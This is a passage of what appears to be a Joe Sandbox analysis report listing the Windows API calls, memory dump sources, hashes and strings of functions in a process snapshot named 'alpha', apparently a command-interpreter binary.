                                                                    • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF71967507A), ref: 00007FF71968D07F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                    • String ID:
                                                                    • API String ID: 1033415088-0
                                                                    • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                    • Instruction ID: 76cda280fee02965b4c95672eb3069fff4851285ad3e60fb2729e4838e0a22e2
                                                                    • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                    • Instruction Fuzzy Hash: 73118E31618A42C7DA049F20F45517AF7A1FB9EBA9F806135EA8E47B54DF3CC04ACB20
                                                                    APIs
                                                                      • Part of subcall function 00007FF719671EA0: wcschr.MSVCRT(?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF719690D54), ref: 00007FF719671EB3
                                                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF719665A2E
                                                                    • _open_osfhandle.MSVCRT ref: 00007FF719665A4F
                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF71966260D), ref: 00007FF7196837AA
                                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7196837D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                    • String ID:
                                                                    • API String ID: 22757656-0
                                                                    • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                    • Instruction ID: 1641180d8563beedd64de6d4e55eaea48fc97369e2583b31bb4aeb4fff9ff190
                                                                    • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                    • Instruction Fuzzy Hash: 1F113371614A458BE7105F24E44937DB671F789B78F945734D629473D0DF3CD44A8B20
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF719685433,?,?,?,00007FF7196869B8,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196856C5
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF7196856D9
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF719685433,?,?,?,00007FF7196869B8,?,?,?,?,?,00007FF719678C39), ref: 00007FF7196856FD
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF719685711
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                    • Instruction ID: eb039724fa13e273c60be5bd2739e7eb21d991b7fe18d0d2e4e8e8a7a38f0a1a
                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                    • Instruction Fuzzy Hash: AC112872A04F81CADB009F56E5040ACBBB1F749F94B889165DB4E03718DF38E49AC754
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                    • String ID:
                                                                    • API String ID: 140117192-0
                                                                    • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                    • Instruction ID: 6f3d18baf94079affc898365d80d45ad502efa7b887c7e52eb33f569f9d5c4aa
                                                                    • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                    • Instruction Fuzzy Hash: 3C21C235918F4189E640AF04E890369B3B6FB99B68F900176EA8D43764DF7DE45AC720
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AD6
                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF719674AEF
                                                                      • Part of subcall function 00007FF719674A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A28
                                                                      • Part of subcall function 00007FF719674A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A66
                                                                      • Part of subcall function 00007FF719674A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A7D
                                                                      • Part of subcall function 00007FF719674A14: memmove.MSVCRT(?,?,00000000,00007FF7196749F1), ref: 00007FF719674A9A
                                                                      • Part of subcall function 00007FF719674A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7196749F1), ref: 00007FF719674AA2
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF719668798), ref: 00007FF71967EE64
                                                                    • RtlFreeHeap.NTDLL ref: 00007FF71967EE78
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                    • String ID:
                                                                    • API String ID: 2759988882-0
                                                                    • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                    • Instruction ID: 51fa0da03e6b8101dccaf09e4e4333aea77e9b785c44fe339de658af47fe5a4a
                                                                    • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                    • Instruction Fuzzy Hash: 2EF0F461A15F428AEB156F659404578E9F3FF4EB55BC89474CD0E46350FE3CA44E8730
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                    • String ID:
                                                                    • API String ID: 1606018815-0
                                                                    • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                    • Instruction ID: 62f7212c6c05d0c6630d81af521a55f40d828e0830d20cb3967472c3fe37179c
                                                                    • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                    • Instruction Fuzzy Hash: 7AF0F831A24E42CBD6046F10E444679FA71FB8AB16F84A264DA0A02394DF3CD00A8B60
                                                                    APIs
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706D6
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF7196706F0
                                                                      • Part of subcall function 00007FF7196706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF71967074D
                                                                      • Part of subcall function 00007FF7196706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF71966B4DB), ref: 00007FF719670762
                                                                      • Part of subcall function 00007FF71966EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF71966E626,?,?,00000000,00007FF719671F69), ref: 00007FF71966F000
                                                                      • Part of subcall function 00007FF71966EF40: wcschr.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F031
                                                                      • Part of subcall function 00007FF71966EF40: iswdigit.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71966F0D6
                                                                    • longjmp.MSVCRT ref: 00007FF71967CCBC
                                                                    • longjmp.MSVCRT(?,?,00000000,00007FF719671F69,?,?,?,?,?,?,?,00007FF71966286E,00000000,00000000,00000000,00000000), ref: 00007FF71967CCE0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                    • String ID: GeToken: (%x) '%s'
                                                                    • API String ID: 3282654869-1994581435
                                                                    • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                    • Instruction ID: 10a9b18178ff9564474aad7593c27098f37d95ce688b28037d5c87b2cd83ee88
                                                                    • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                    • Instruction Fuzzy Hash: A061D061F09E4282FA1ABF219850179A2B2AF44BBCF944535CA1D077E5EE3DF45A8330
                                                                    APIs
                                                                      • Part of subcall function 00007FF71966CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDA6
                                                                      • Part of subcall function 00007FF71966CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF71966B9A1,?,?,?,?,00007FF71966D81A), ref: 00007FF71966CDBD
                                                                    • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF71968827A), ref: 00007FF7196911DC
                                                                    • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF71968827A), ref: 00007FF719691277
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$AllocProcessmemmovewcschr
                                                                    • String ID: &()[]{}^=;!%'+,`~
                                                                    • API String ID: 1135967885-381716982
                                                                    • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                    • Instruction ID: e707eecb8b4dd9b224621bb244c658595d97a930e573124612d14c01f73aca1a
                                                                    • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                    • Instruction Fuzzy Hash: 2B71A971A08A42CDD760EF15A440679F6F6FB547ACF91423ACA4D83B94DB3CA44B8730
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: memmovewcsncmp
                                                                    • String ID: 0123456789
                                                                    • API String ID: 3879766669-2793719750
                                                                    • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                    • Instruction ID: 56646f49f9d86ebd6d3c55ae3ed4fc89bc6f5a5dd74d9857d2d24dcd410a3aa9
                                                                    • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                    • Instruction Fuzzy Hash: CC41FF21F18F8545EA24AF29D4002BAB3B6FB44BE8F845132DD4E47785DE3CD44AC3A0
                                                                    APIs
                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7196897D0
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7196898D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                    • String ID: Software\Classes
                                                                    • API String ID: 2714550308-1656466771
                                                                    • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                    • Instruction ID: b670f6b58ecc39eeb64521a829c498d155a7eb75be022071d8b30ecbd7d7b1bd
                                                                    • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                    • Instruction Fuzzy Hash: 9F418032A19F52C1EA00EF16D445439E3B6FB45BE8B908631DA5E477E1DE39E84BC360
                                                                    APIs
                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968A0FC
                                                                      • Part of subcall function 00007FF71966D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D46E
                                                                      • Part of subcall function 00007FF71966D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF71966D485
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D4EE
                                                                      • Part of subcall function 00007FF71966D3F0: iswspace.MSVCRT ref: 00007FF71966D54D
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D569
                                                                      • Part of subcall function 00007FF71966D3F0: wcschr.MSVCRT ref: 00007FF71966D58C
                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71968A1FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                    • String ID: Software\Classes
                                                                    • API String ID: 2714550308-1656466771
                                                                    • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                    • Instruction ID: f013edfad5c8a968879c54b9be442b1f148472d48dcef11494be8448df7b900f
                                                                    • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                    • Instruction Fuzzy Hash: 07416D32A09F52C1EA00AF19D54543DE3B6FB857E8B908131DE5E437A1EE39E85BC360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleTitle
                                                                    • String ID: -
                                                                    • API String ID: 3358957663-3695764949
                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                    • Instruction ID: 1b15b64128411aa43631b05a7d3025d8931a265a9cd5a37aabb9bea8ee504f8d
                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                    • Instruction Fuzzy Hash: D9317021E08E4296EA14BF11A410078EBB6BB89FB8F955135DE0E07799DF3CE44AC374
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmpswscanf
                                                                    • String ID: :EOF
                                                                    • API String ID: 1534968528-551370653
                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                    • Instruction ID: 24982b51ea495227032aa5036285024e5ef949bf33ba12e8ab1c1d978f3ec61b
                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                    • Instruction Fuzzy Hash: D6316C31A09E4286FA18AF15A8402B8F2B2EF45B78FC44131EA4D06295DF2CE94BC670
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1307495693.00007FF719661000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF719660000, based on PE: true
                                                                    • Associated: 00000004.00000002.1307481498.00007FF719660000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF71969D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307551333.00007FF7196AF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1307600238.00007FF7196B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7ff719660000_alpha.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsnicmp
                                                                    • String ID: /-Y
                                                                    • API String ID: 1886669725-4274875248
                                                                    • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                    • Instruction ID: e61a4bd7699631f11938bbf76384370ea10a7c24430a36daca77c50559c79d38
                                                                    • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                    • Instruction Fuzzy Hash: 08218166E08F5685EA10AF029540578F6B2BB45FE8F859031EE8807794DE3CE88BD330
                                                                    Strings
